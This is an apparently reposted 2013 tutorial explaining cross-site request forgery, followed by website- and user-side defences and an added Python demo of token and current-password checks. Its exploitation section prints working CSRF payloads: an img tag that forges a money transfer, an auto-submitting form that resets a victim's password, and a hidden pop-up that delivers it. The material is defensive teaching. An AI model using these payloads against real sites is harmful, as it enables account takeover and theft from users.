Nytro

Understanding Cross Site Request Forgery


Title: Understanding Cross Site Request Forgery
Author: Simo Ben youssef
Contact: simo_at_morxploit_dot_com
Published: 30 January 2013
MorXploit Research
http://www.morxploit.com
Audience: IT security professionals / Web administrators / Regular web users


Introduction:

Cross Site Request Forgery, also known as XSRF and abbreviated as CSRF, is a type of 'one click' attack in which malicious code is used to exploit a victim's on-line account by automatically sending unauthorized instructions through the victim's browser to a vulnerable website, making changes according to the attacker's aim and the impact of the vulnerability.


Examples:

The attack works by making a target user click on a link which points to the attacker's malicious code; the code then sends commands to the vulnerable website, which assumes that the request was willingly sent by the authenticated victim and processes the changes.
An example could be a request to change a password: a vulnerable website will not ask you to confirm the change by submitting your current password, nor will it use some other form of verification such as token IDs, so your password is changed without your permission, giving the attacker complete access to your account.

The process involves three steps:

1- The victim clicks on a malicious link.
2- The link automatically requests changes to be made within the vulnerable site as defined by the attacker.
3- The website processes the change because it relies solely on the user authentication cookie.


Limitations:

For the attack to succeed, assuming that the attacker has successfully coded the exploit, three requirements must be met:

1- The target website must be vulnerable to CSRF.
2- The victim must click on a link.
3- The victim must be authenticated.


Severity:

According to the United States Department Of Homeland Security, the CSRF vulnerability ranks as the 909th most dangerous software bug ever found. CSRF can be used to change a victim's password, post data on the victim's behalf or even execute code remotely, resulting in data compromise.


Technical exploitation:

In order to exploit CSRF, the attacker must have access to the same private area that the victim uses, and then analyze the vulnerable HTML code.
The attacker needs to determine the form input names when the HTTP POST method is used, or the variable names when HTTP GET is used instead, which is very rare.
A GET request can be easily exploited by using the 'img' tag to perform the malicious request.
For example, the attacker can include the following hidden link on his target page:

<img src="http://vulnerablebank/quickpay?senderaccount=victim&receiveraccount=attacker&amount=1000">

This sends the specified amount of money to the attacker's account.

The POST request, which is the most common form used, is a little bit tricky and can be visually detected. The reason is that there is no way a form can be posted 'silently' using just HTML; the only way to do that is through AJAX, but luckily, due to AJAX security restrictions, it will not be possible to exploit it because AJAX will not send your authentication cookie from a domain name other than the target domain name itself.
The only way left is using JavaScript, which can automatically submit a form using the onload attribute within the body tag.
An example of a form that automatically attempts to change a user's password could be:

<html>
<body onload="document.xploitform.submit(); ">
<form name="xploitform" method="post" action="http://www.somevulnerablesite/changepassword">
<input type="hidden" name="newpassword" value='hacked'>
<input type="hidden" name="confirmpassword" value='hacked'>
</form></body>
</html>

To make this more interesting, the attacker can open the form's link as a small pop-up window from another page while displaying a picture or other content to grab the victim's attention; in this particular case the attack is a combination of both CSRF and social engineering.
The following code can be used to do that:

<html>
<body onload="window.open('http://attackersite.com/linktothepreviousform.html','myWin','scrollbars=no,width=1,height=1,left=2000,top=2000');">
<center><img src="http://www.morxploit.com/images/logo.png"></center>
</body>
</html>

This displays an image in the center of the page and pops up the form as a small window placed in the corner of the screen.


Prevention:

1- Website side:

* Requiring the user's current password whenever a change is requested.
* Implementing hidden, per-user token IDs (anti-CSRF tokens) in every state-changing form.

2- User side

* Avoid opening external links in the same authenticated browser; use a different, unauthenticated browser instead, or, if you are using Google Chrome, hit Shift + CTRL + N to go into incognito mode.
* Experienced users can use a data monitoring tool such as the Firefox add-on Tamper Data to verify any data sent by the browser.
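Both website-side measures above amount to a few lines of server logic. The following Python is an added example written for this page, not code from the paper or from morxploit.com; the in-memory session store, the /changepassword route, the field names and the sample credentials are all constructed assumptions. It places a handler that trusts the session cookie alone (the flaw described in the exploitation section) beside a hardened version that checks a per-session hidden token and the user's current password, then replays the paper's forged POST (newpassword=hacked, confirmpassword=hacked) against both.

```python
import hashlib
import hmac
import secrets

# Constructed in-memory session store: session cookie value -> session record.
SESSIONS = {}


def hash_password(password: str) -> str:
    # Demo hash only; a real application would use a slow, salted KDF.
    return hashlib.sha256(password.encode()).hexdigest()


def login(username: str, password: str) -> str:
    """Create a session and return the cookie value the browser would hold."""
    session_id = secrets.token_urlsafe(16)
    SESSIONS[session_id] = {
        "user": username,
        "pw_hash": hash_password(password),
        # One unguessable anti-CSRF token per session. The attacker's page
        # never sees it, so a forged form cannot include it.
        "csrf_token": secrets.token_urlsafe(32),
    }
    return session_id


def render_change_password_form(session_id: str) -> str:
    """The legitimate form embeds the session's token as a hidden field."""
    token = SESSIONS[session_id]["csrf_token"]
    return (
        '<form method="post" action="/changepassword">\n'
        f'<input type="hidden" name="csrf_token" value="{token}">\n'
        '<input type="password" name="current_password">\n'
        '<input type="password" name="newpassword">\n'
        '<input type="password" name="confirmpassword">\n'
        "</form>"
    )


def change_password_vulnerable(session_id: str, form: dict) -> tuple:
    """Handler that relies solely on the authentication cookie (the flaw)."""
    session = SESSIONS.get(session_id)
    if session is None:
        return 401, "not authenticated"
    if form.get("newpassword") != form.get("confirmpassword"):
        return 400, "passwords do not match"
    session["pw_hash"] = hash_password(form["newpassword"])
    return 200, "password changed"


def change_password_hardened(session_id: str, form: dict) -> tuple:
    """Same handler with both website-side defences from the paper."""
    session = SESSIONS.get(session_id)
    if session is None:
        return 401, "not authenticated"
    # Defence: the hidden token must match the one issued to this session.
    # compare_digest keeps the comparison constant-time.
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return 403, "missing or invalid CSRF token"
    # Defence: the current password must be supplied and correct.
    supplied = hash_password(form.get("current_password", ""))
    if not hmac.compare_digest(supplied, session["pw_hash"]):
        return 403, "current password incorrect"
    if form.get("newpassword") != form.get("confirmpassword"):
        return 400, "passwords do not match"
    session["pw_hash"] = hash_password(form["newpassword"])
    return 200, "password changed"


def demo() -> dict:
    """Replay the paper's forged POST against both handlers; return status codes."""
    forged = {"newpassword": "hacked", "confirmpassword": "hacked"}
    # Session A, vulnerable handler: the forged POST changes the password.
    sid_a = login("victim", "correct horse")
    vulnerable = change_password_vulnerable(sid_a, forged)[0]
    # Session B, hardened handler: the same forged POST is refused (no token).
    sid_b = login("victim", "correct horse")
    hardened_forged = change_password_hardened(sid_b, forged)[0]
    # Right token but wrong current password is also refused.
    token = SESSIONS[sid_b]["csrf_token"]
    wrong_pw = {**forged, "csrf_token": token, "current_password": "guess"}
    hardened_wrong_pw = change_password_hardened(sid_b, wrong_pw)[0]
    # The genuine submission, with token and current password, succeeds.
    genuine = {**forged, "csrf_token": token, "current_password": "correct horse"}
    hardened_genuine = change_password_hardened(sid_b, genuine)[0]
    return {
        "vulnerable_forged": vulnerable,
        "hardened_forged": hardened_forged,
        "hardened_wrong_password": hardened_wrong_pw,
        "hardened_genuine": hardened_genuine,
    }


if __name__ == "__main__":
    for case, status in demo().items():
        print(f"{case}: {status}")
```

The token is bound to the session rather than to a fixed value, so the attacker's pre-built form in the exploitation section arrives without it and is refused before the password check even runs; the current-password check then covers the case where a token has leaked, for instance through a separate XSS flaw.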


Conclusion:

CSRF is a dangerous attack that can result in data compromise when successfully exploited; it is the responsibility of both the website and the user to prevent such attacks.
The Internet has enormous security resources, so web developers and website admins have no excuse not to learn basic security in order to protect their customers; meanwhile, users should use some common sense and stop blindly clicking on links.


Author disclaimer:

The information contained in this entire document is for educational and demonstration purposes only. Modification, use and publishing of this information is entirely at your own risk; I cannot be held responsible for any malicious use.

Source: http://www.morxploit.com/csrf.txt
